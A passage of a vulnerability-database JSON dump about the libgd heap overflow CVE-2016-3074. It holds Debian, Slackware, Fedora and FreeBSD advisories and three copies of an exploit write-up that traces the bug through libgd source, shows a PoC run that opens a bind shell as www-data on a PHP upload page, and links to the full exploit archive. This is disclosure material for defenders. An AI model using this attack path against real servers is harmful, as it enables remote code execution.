security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nApril 24, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libgd2\nCVE ID : CVE-2016-3074\nDebian Bug : 822242\n\nHans Jerry Illikainen discovered that libgd2, a library for programmatic\ngraphics creation and manipulation, suffers of a signedness\nvulnerability which may result in a heap overflow when processing\nspecially crafted compressed gd2 data. 
A remote attacker can take\nadvantage of this flaw to cause an application using the libgd2 library\nto crash, or potentially, to execute arbitrary code with the privileges\nof the user running the application.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.1.1-4.1.\n\nWe recommend that you upgrade your libgd2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2016-04-24T10:29:47", "published": "2016-04-24T10:29:47", "id": "DEBIAN:DSA-3556-1:CAE3D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00132.html", "title": "[SECURITY] [DSA 3556-1] libgd2 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T01:10:21", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4540", "CVE-2016-4538", "CVE-2013-7456", "CVE-2016-4544", "CVE-2016-4543", "CVE-2016-4542", "CVE-2016-4541", "CVE-2016-4539", "CVE-2016-5093", "CVE-2016-3074", "CVE-2016-5094", "CVE-2016-5095", "CVE-2016-5096", "CVE-2016-4537"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3602-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 14, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2013-7456 CVE-2016-3074 CVE-2016-4537 CVE-2016-4538\n CVE-2016-4539 CVE-2016-4540 CVE-2016-4541 CVE-2016-4542\n CVE-2016-4543 CVE-2016-4544 
CVE-2016-5093 CVE-2016-5094\n CVE-2016-5095 CVE-2016-5096\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to the new upstream\nversion 5.6.22, which includes additional bug fixes. Please refer to the\nupstream changelog for more information:\n\n https://php.net/ChangeLog-5.php#5.6.21\nhttps://php.net/ChangeLog-5.php#5.6.22\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.22+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2016-06-14T15:44:13", "published": "2016-06-14T15:44:13", "id": "DEBIAN:DSA-3602-1:52B21", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00180.html", "title": "[SECURITY] [DSA 3602-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:59", "description": "\nlibgd 2.1.1 - Signedness Heap Overflow", "edition": 1, "published": "2016-04-26T00:00:00", "title": "libgd 2.1.1 - Signedness Heap Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-26T00:00:00", "id": "EXPLOITPACK:1108993BC3B3774C486440F61128433E", "href": "", "sourceData": "Overview\n========\n\nlibgd [1] is an open-source image library. It is perhaps primarily used\nby the PHP project. 
It has been bundled with the default installation\nof PHP since version 4.3 [2].\n\nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which\nmay result in a heap overflow when processing compressed gd2 data.\n\n\nDetails\n=======\n\n4 bytes representing the chunk index size is stored in a signed integer,\nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 53 typedef struct {\n| 54 int offset;\n| 55 int size;\n| 56 }\n| 57 t_chunk_info;\n`----\n\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 65 static int\n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,\n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,\n| 68 t_chunk_info ** chunkIdx)\n| 69 {\n| ...\n| 73 t_chunk_info *cidx;\n| ...\n| 155 if (gd2_compressed (*fmt)) {\n| ...\n| 163 for (i = 0; i < nc; i++) {\n| ...\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) {\n| 168 goto fail2;\n| 169 };\n| 170 };\n| 171 *chunkIdx = cidx;\n| 172 };\n| ...\n| 181 }\n`----\n\n\n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then\nallocates memory for the compressed data based on the value of the\nlargest chunk size:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 371|637 if (gd2_compressed (fmt)) {\n| 372|638 /* Find the maximum compressed chunk size. */\n| 373|639 compMax = 0;\n| 374|640 for (i = 0; (i < nc); i++) {\n| 375|641 if (chunkIdx[i].size > compMax) {\n| 376|642 compMax = chunkIdx[i].size;\n| 377|643 };\n| 378|644 };\n| 379|645 compMax++;\n| ...|...\n| 387|656 compBuf = gdCalloc (compMax, 1);\n| ...|...\n| 393|661 };\n`----\n\n\nA size of <= 0 results in `compMax' retaining its initial value during\nthe loop, followed by it being incremented to 1. 
Since `compMax' is\nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation\nfor `compBuf'.\n\nThis is followed by compressed data being read to `compBuf' based on the\ncurrent (potentially negative) chunk size:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)\n| 340 {\n| ...\n| 413 if (gd2_compressed (fmt)) {\n| 414\n| 415 chunkLen = chunkMax;\n| 416\n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\n| 418 compBuf,\n| 419 chunkIdx[chunkNum].size,\n| 420 (char *) chunkBuf, &chunkLen, in)) {\n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\"));\n| 422 goto fail;\n| 423 };\n| 424\n| 425 chunkPos = 0;\n| 426 };\n| ...\n| 501 }\n`----\n\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)\n| 586 {\n| ...\n| 713 if (!gd2_compressed (fmt)) {\n| ...\n| 731 } else {\n| 732 chunkNum = cx + cy * ncx;\n| 733\n| 734 chunkLen = chunkMax;\n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\n| 736 compBuf,\n| 737 chunkIdx[chunkNum].size,\n| 738 (char *) chunkBuf, &chunkLen, in)) {\n| 739 printf (\"Error reading comproessed chunk\\n\");\n| 740 goto fail2;\n| 741 };\n| ...\n| 746 };\n| ...\n| 815 }\n`----\n\n\nThe size is subsequently interpreted as a size_t by `fread()' or\n`memcpy()', depending on how the image is read:\n\nlibgd-2.1.1/src/gd_gd2.c:\n,----\n| 221 static int\n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,\n| 223 uLongf * chunkLen, gdIOCtx * in)\n| 224 {\n| ...\n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {\n| 237 return FALSE;\n| 238 };\n| ...\n| 251 }\n`----\n\nlibgd-2.1.1/src/gd_io.c:\n,----\n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)\n| 212 {\n| 213 return (ctx->getBuf)(ctx, buf, size);\n| 214 }\n`----\n\n\nFor file contexts:\n\nlibgd-2.1.1/src/gd_io_file.c:\n,----\n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)\n| 53 {\n| 
...\n| 67 ctx->ctx.getBuf = fileGetbuf;\n| ...\n| 76 }\n| ...\n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)\n| 93 {\n| 94 fileIOCtx *fctx;\n| 95 fctx = (fileIOCtx *)ctx;\n| 96\n| 97 return (fread(buf, 1, size, fctx->f));\n| 98 }\n`----\n\n\nAnd for dynamic contexts:\n\nlibgd-2.1.1/src/gd_io_dp.c:\n,----\n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)\n| 75 {\n| ...\n| 95 ctx->ctx.getBuf = dynamicGetbuf;\n| ...\n| 104 }\n| ...\n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)\n| 257 {\n| ...\n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);\n| ...\n| 284 }\n`----\n\n\nPoC\n===\n\nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:\n\n,----\n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\n| [*] this may take a while\n| [*] offset 912 of 10000...\n| [+] connected to 1.2.3.4:5555\n| id\n| uid=33(www-data) gid=33(www-data) groups=33(www-data)\n| \n| uname -a\n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\n| 2016 x86_64 x86_64 x86_64 GNU/Linux\n| \n| dpkg -l|grep -E \"php5-(fpm|gd)\"\n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\n| \n| cat upload.php\n| <?php\n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\n| ?>\n`----\n\n\nSolution\n========\n\nThis bug has been fixed in git HEAD [4].\n\nFull Proof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39736.zip\n\nFootnotes\n_________\n\n[1] [http://libgd.org/]\n[2] [https://en.wikipedia.org/wiki/Libgd]\n[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]\n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "New php packages are available for 
Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.6.21-i486-1_slack14.1.txz: Upgraded.\n This release fixes bugs and security issues.\n For more information, see:\n http://php.net/ChangeLog-5.php#5.6.21\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.21-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.21-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.21-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.21-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.21-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.21-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nbf19a4472daa4fb81efe40f08bdd28b1 php-5.6.21-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n448ab59bade7a084d392177de2514ecf php-5.6.21-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd9e0a2107e010470676da690cd767f87 php-5.6.21-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nc01a13118b9803686487df2673cba58a php-5.6.21-x86_64-1_slack14.1.txz\n\nSlackware -current 
package:\n9bd2f2fdf8512763550562ed7efcb996 n/php-5.6.21-i586-1.txz\n\nSlackware x86_64 -current package:\n6d5a5d3075daffd829f4cde051a7e099 n/php-5.6.21-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.6.21-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2016-04-29T21:57:42", "published": "2016-04-29T21:57:42", "id": "SSA-2016-120-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.383127", "type": "slackware", "title": "[slackware-security] php", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2017-12-31T23:14:17", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-04-26T00:00:00", "type": "zdt", "title": "libgd 2.1.1 - Signedness Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-26T00:00:00", "id": "1337DAY-ID-25407", "href": "https://0day.today/exploit/description/25407", "sourceData": "Overview\r\n========\r\n \r\nlibgd [1] is an open-source image library. It is perhaps primarily used\r\nby the PHP project. 
It has been bundled with the default installation\r\nof PHP since version 4.3 [2].\r\n \r\nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which\r\nmay result in a heap overflow when processing compressed gd2 data.\r\n \r\n \r\nDetails\r\n=======\r\n \r\n4 bytes representing the chunk index size is stored in a signed integer,\r\nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 53 typedef struct {\r\n| 54 int offset;\r\n| 55 int size;\r\n| 56 }\r\n| 57 t_chunk_info;\r\n`----\r\n \r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 65 static int\r\n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,\r\n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,\r\n| 68 t_chunk_info ** chunkIdx)\r\n| 69 {\r\n| ...\r\n| 73 t_chunk_info *cidx;\r\n| ...\r\n| 155 if (gd2_compressed (*fmt)) {\r\n| ...\r\n| 163 for (i = 0; i < nc; i++) {\r\n| ...\r\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) {\r\n| 168 goto fail2;\r\n| 169 };\r\n| 170 };\r\n| 171 *chunkIdx = cidx;\r\n| 172 };\r\n| ...\r\n| 181 }\r\n`----\r\n \r\n \r\n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then\r\nallocates memory for the compressed data based on the value of the\r\nlargest chunk size:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 371|637 if (gd2_compressed (fmt)) {\r\n| 372|638 /* Find the maximum compressed chunk size. */\r\n| 373|639 compMax = 0;\r\n| 374|640 for (i = 0; (i < nc); i++) {\r\n| 375|641 if (chunkIdx[i].size > compMax) {\r\n| 376|642 compMax = chunkIdx[i].size;\r\n| 377|643 };\r\n| 378|644 };\r\n| 379|645 compMax++;\r\n| ...|...\r\n| 387|656 compBuf = gdCalloc (compMax, 1);\r\n| ...|...\r\n| 393|661 };\r\n`----\r\n \r\n \r\nA size of <= 0 results in `compMax' retaining its initial value during\r\nthe loop, followed by it being incremented to 1. 
Since `compMax' is\r\nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation\r\nfor `compBuf'.\r\n \r\nThis is followed by compressed data being read to `compBuf' based on the\r\ncurrent (potentially negative) chunk size:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)\r\n| 340 {\r\n| ...\r\n| 413 if (gd2_compressed (fmt)) {\r\n| 414\r\n| 415 chunkLen = chunkMax;\r\n| 416\r\n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 418 compBuf,\r\n| 419 chunkIdx[chunkNum].size,\r\n| 420 (char *) chunkBuf, &chunkLen, in)) {\r\n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\"));\r\n| 422 goto fail;\r\n| 423 };\r\n| 424\r\n| 425 chunkPos = 0;\r\n| 426 };\r\n| ...\r\n| 501 }\r\n`----\r\n \r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)\r\n| 586 {\r\n| ...\r\n| 713 if (!gd2_compressed (fmt)) {\r\n| ...\r\n| 731 } else {\r\n| 732 chunkNum = cx + cy * ncx;\r\n| 733\r\n| 734 chunkLen = chunkMax;\r\n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 736 compBuf,\r\n| 737 chunkIdx[chunkNum].size,\r\n| 738 (char *) chunkBuf, &chunkLen, in)) {\r\n| 739 printf (\"Error reading comproessed chunk\\n\");\r\n| 740 goto fail2;\r\n| 741 };\r\n| ...\r\n| 746 };\r\n| ...\r\n| 815 }\r\n`----\r\n \r\n \r\nThe size is subsequently interpreted as a size_t by `fread()' or\r\n`memcpy()', depending on how the image is read:\r\n \r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 221 static int\r\n| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,\r\n| 223 uLongf * chunkLen, gdIOCtx * in)\r\n| 224 {\r\n| ...\r\n| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {\r\n| 237 return FALSE;\r\n| 238 };\r\n| ...\r\n| 251 }\r\n`----\r\n \r\nlibgd-2.1.1/src/gd_io.c:\r\n,----\r\n| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)\r\n| 212 {\r\n| 213 return 
(ctx->getBuf)(ctx, buf, size);\r\n| 214 }\r\n`----\r\n \r\n \r\nFor file contexts:\r\n \r\nlibgd-2.1.1/src/gd_io_file.c:\r\n,----\r\n| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)\r\n| 53 {\r\n| ...\r\n| 67 ctx->ctx.getBuf = fileGetbuf;\r\n| ...\r\n| 76 }\r\n| ...\r\n| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)\r\n| 93 {\r\n| 94 fileIOCtx *fctx;\r\n| 95 fctx = (fileIOCtx *)ctx;\r\n| 96\r\n| 97 return (fread(buf, 1, size, fctx->f));\r\n| 98 }\r\n`----\r\n \r\n \r\nAnd for dynamic contexts:\r\n \r\nlibgd-2.1.1/src/gd_io_dp.c:\r\n,----\r\n| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)\r\n| 75 {\r\n| ...\r\n| 95 ctx->ctx.getBuf = dynamicGetbuf;\r\n| ...\r\n| 104 }\r\n| ...\r\n| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)\r\n| 257 {\r\n| ...\r\n| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);\r\n| ...\r\n| 284 }\r\n`----\r\n \r\n \r\nPoC\r\n===\r\n \r\nAgainst Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:\r\n \r\n,----\r\n| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n| [*] this may take a while\r\n| [*] offset 912 of 10000...\r\n| [+] connected to 1.2.3.4:5555\r\n| id\r\n| uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n| \r\n| uname -a\r\n| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n| 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n| \r\n| dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\r\n| \r\n| cat upload.php\r\n| <?php\r\n| imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n| ?>\r\n`----\r\n \r\n \r\nSolution\r\n========\r\n \r\nThis bug has been fixed in git HEAD [4].\r\n \r\nFull Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip\r\n \r\nFootnotes\r\n_________\r\n \r\n[1] [http://libgd.org/]\r\n[2] [https://en.wikipedia.org/wiki/Libgd]\r\n[3] 
[https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]\r\n[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/25407"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "The gd graphics library allows your code to quickly draw images complete with lines, arcs, text, multiple colors, cut and paste from other images, and flood fills, and to write out the result as a PNG or JPEG file. This is particularly useful in Web applications, where PNG and JPEG are two of the formats accepted for inline images by most browsers. Note that gd is not a paint program. ", "modified": "2016-04-30T00:27:18", "published": "2016-04-30T00:27:18", "id": "FEDORA:73AFA606D3C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: gd-2.1.1-5.fc23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "The gd graphics library allows your code to quickly draw images complete with lines, arcs, text, multiple colors, cut and paste from other images, and flood fills, and to write out the result as a PNG or JPEG file. This is particularly useful in Web applications, where PNG and JPEG are two of the formats accepted for inline images by most browsers. Note that gd is not a paint program. 
", "modified": "2016-05-07T12:28:06", "published": "2016-05-07T12:28:06", "id": "FEDORA:4C10A6062BF1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: gd-2.1.1-7.fc24", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "The gd graphics library allows your code to quickly draw images complete with lines, arcs, text, multiple colors, cut and paste from other images, and flood fills, and to write out the result as a PNG or JPEG file. This is particularly useful in Web applications, where PNG and JPEG are two of the formats accepted for inline images by most browsers. Note that gd is not a paint program. ", "modified": "2016-05-16T14:58:01", "published": "2016-05-16T14:58:01", "id": "FEDORA:49506619160F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: gd-2.1.1-3.fc22", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3074"], "description": "\nThe PHP Group reports:\n\nBCMath:\n\t \nFixed bug #72093 (bcpowmod accepts negative scale and corrupts\n\t _one_ definition).\n\nExif:\n\t \nFixed bug #72094 (Out of bounds heap read access in exif header\n\t processing).\n\nGD:\n\t \nFixed bug #71912 (libgd: signedness vulnerability).\n\t (CVE-2016-3074)\n\nIntl:\n\t \nFixed bug #72061 (Out-of-bounds reads in zif_grapheme_stripos\n\t with negative offset).\n\nXML:\n\t \nFixed bug #72099 (xml_parse_into_struct segmentation fault).\n\t \n\n\n\n", "edition": 4, "modified": "2016-04-28T00:00:00", "published": "2016-04-28T00:00:00", "id": "5764C634-10D2-11E6-94FA-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/5764c634-10d2-11e6-94fa-002590263bf5.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": 
[{"lastseen": "2016-04-26T18:10:10", "description": "libgd 2.1.1 - Signedness Heap Overflow. CVE-2016-3074. Remote exploit for linux platform", "published": "2016-04-26T00:00:00", "type": "exploitdb", "title": "libgd 2.1.1 - Signedness Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-26T00:00:00", "id": "EDB-ID:39736", "href": "https://www.exploit-db.com/exploits/39736/", "sourceData": "Overview\r\n========\r\n\r\nlibgd [1] is an open-source image library. It is perhaps primarily used\r\nby the PHP project. It has been bundled with the default installation\r\nof PHP since version 4.3 [2].\r\n\r\nA signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which\r\nmay result in a heap overflow when processing compressed gd2 data.\r\n\r\n\r\nDetails\r\n=======\r\n\r\n4 bytes representing the chunk index size is stored in a signed integer,\r\nchunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 53 typedef struct {\r\n| 54 int offset;\r\n| 55 int size;\r\n| 56 }\r\n| 57 t_chunk_info;\r\n`----\r\n\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 65 static int\r\n| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,\r\n| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,\r\n| 68 t_chunk_info ** chunkIdx)\r\n| 69 {\r\n| ...\r\n| 73 t_chunk_info *cidx;\r\n| ...\r\n| 155 if (gd2_compressed (*fmt)) {\r\n| ...\r\n| 163 for (i = 0; i < nc; i++) {\r\n| ...\r\n| 167 if (gdGetInt (&cidx[i].size, in) != 1) {\r\n| 168 goto fail2;\r\n| 169 };\r\n| 170 };\r\n| 171 *chunkIdx = cidx;\r\n| 172 };\r\n| ...\r\n| 181 }\r\n`----\r\n\r\n\r\n`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then\r\nallocates memory for the compressed data based on the value of the\r\nlargest chunk size:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 371|637 if (gd2_compressed (fmt)) {\r\n| 372|638 /* Find the maximum compressed chunk size. 
*/\r\n| 373|639 compMax = 0;\r\n| 374|640 for (i = 0; (i < nc); i++) {\r\n| 375|641 if (chunkIdx[i].size > compMax) {\r\n| 376|642 compMax = chunkIdx[i].size;\r\n| 377|643 };\r\n| 378|644 };\r\n| 379|645 compMax++;\r\n| ...|...\r\n| 387|656 compBuf = gdCalloc (compMax, 1);\r\n| ...|...\r\n| 393|661 };\r\n`----\r\n\r\n\r\nA size of <= 0 results in `compMax' retaining its initial value during\r\nthe loop, followed by it being incremented to 1. Since `compMax' is\r\nused as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation\r\nfor `compBuf'.\r\n\r\nThis is followed by compressed data being read to `compBuf' based on the\r\ncurrent (potentially negative) chunk size:\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)\r\n| 340 {\r\n| ...\r\n| 413 if (gd2_compressed (fmt)) {\r\n| 414\r\n| 415 chunkLen = chunkMax;\r\n| 416\r\n| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 418 compBuf,\r\n| 419 chunkIdx[chunkNum].size,\r\n| 420 (char *) chunkBuf, &chunkLen, in)) {\r\n| 421 GD2_DBG (printf (\"Error reading comproessed chunk\\n\"));\r\n| 422 goto fail;\r\n| 423 };\r\n| 424\r\n| 425 chunkPos = 0;\r\n| 426 };\r\n| ...\r\n| 501 }\r\n`----\r\n\r\n\r\nlibgd-2.1.1/src/gd_gd2.c:\r\n,----\r\n| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)\r\n| 586 {\r\n| ...\r\n| 713 if (!gd2_compressed (fmt)) {\r\n| ...\r\n| 731 } else {\r\n| 732 chunkNum = cx + cy * ncx;\r\n| 733\r\n| 734 chunkLen = chunkMax;\r\n| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,\r\n| 736 compBuf,\r\n| 737 chunkIdx[chunkNum].size,\r\n| 738 (char *) chunkBuf, &chunkLen, in)) {\r\n| 739 printf (\"Error reading comproessed chunk\\n\");\r\n| 740 goto fail2;\r\n| 741 };\r\n| ...\r\n| 746 };\r\n| ...\r\n| 815 }\r\n`----\r\n\r\n\r\nThe size is subsequently interpreted as a size_t by `fread()' or\r\n`memcpy()', depending on how the image is 
